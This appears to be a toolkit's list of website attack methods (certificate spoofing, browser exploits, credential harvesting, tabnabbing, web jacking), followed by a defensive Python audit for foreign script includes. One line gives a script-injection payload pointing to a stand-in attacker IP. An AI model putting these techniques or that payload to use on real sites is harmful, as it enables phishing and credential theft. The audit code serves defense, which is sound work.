Website Attack Vectors
- Java Applet Attack Method
- The Java Applet Attack method will spoof a Java certificate and deliver a Metasploit-based payload. It uses a customized Java applet created by Thomas Werth to deliver the payload.
- Metasploit Browser Exploit Method
- The Metasploit Browser Exploit method will utilize select Metasploit browser exploits through an iframe and deliver a Metasploit payload.
- Credential Harvester Attack Method
- The Credential Harvester method will utilize web cloning of a website that has a username and password field and harvest all the information posted to the website.
- Tabnabbing Attack Method
- The TabNabbing method will wait for a user to move to a different tab, then refresh the page to something different.
- Man Left in the Middle Attack Method
- The Man Left in the Middle Attack method was introduced by Kos and utilizes HTTP Referer headers to intercept fields and harvest data from them. You need to have an already vulnerable site and incorporate <script src="http://YOURIP/">. This could either be from a compromised site or through XSS.
- Web Jacking Attack Method
- The Web-Jacking Attack method was introduced by white_sheep, Emgent and the Back|Track team. This method utilizes iframe replacements to make the highlighted URL link appear legitimate; however, when it is clicked, a window pops up and is then replaced with the malicious link. You can edit the link replacement settings in the set_config if it's too slow or too fast.
- Multi-Attack Web Method
- The Multi-Attack method will add a combination of attacks through the web attack menu. For example, you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing, and the Man Left in the Middle attack all at once to see which is successful.
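
The Man Left in the Middle entry above depends on a <script src="http://YOURIP/"> include being present on an otherwise legitimate page. As an added example (not part of SET or of the original page), the following Python code audits a page's HTML for script includes from hosts outside an allowlist and flags IP-literal and plain-HTTP sources; the function names, the allowlist and the sample markup are assumptions constructed for illustration.

```python
# Added example, not SET code; names and sample data are constructed.
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlsplit

class ScriptAudit(HTMLParser):
    """Collects every <script src=...> URL found in a document."""
    def __init__(self):
        super().__init__()
        self.sources = []
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src.strip())

def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def audit_scripts(html, page_url, allowed_hosts=()):
    """Return (src, reasons) for each script include that needs review."""
    page_host = urlsplit(page_url).hostname
    parser = ScriptAudit()
    parser.feed(html)
    findings = []
    for src in parser.sources:
        parts = urlsplit(src)
        host = parts.hostname
        if host is None or host == page_host or host in allowed_hosts:
            continue  # relative, same-host, or explicitly approved source
        reasons = ["host not in allowlist"]
        if is_ip_literal(host):
            reasons.append("IP-literal host")
        if parts.scheme == "http":
            reasons.append("plain HTTP")
        findings.append((src, reasons))
    return findings

# Constructed sample markup; 192.0.2.10 is a documentation address (RFC 5737).
SAMPLE = ('<script src="/static/app.js"></script>'
          '<script src="https://cdn.example.com/lib.js"></script>'
          '<script src="http://192.0.2.10/"></script>')

if __name__ == "__main__":
    print(audit_scripts(SAMPLE, "https://www.example.com/login", {"cdn.example.com"}))
```

Running the same audit in a deployment pipeline or a scheduled crawl of your own pages turns an unexpected include into an alert, and a Content-Security-Policy `script-src` allowlist enforces the same rule in the browser.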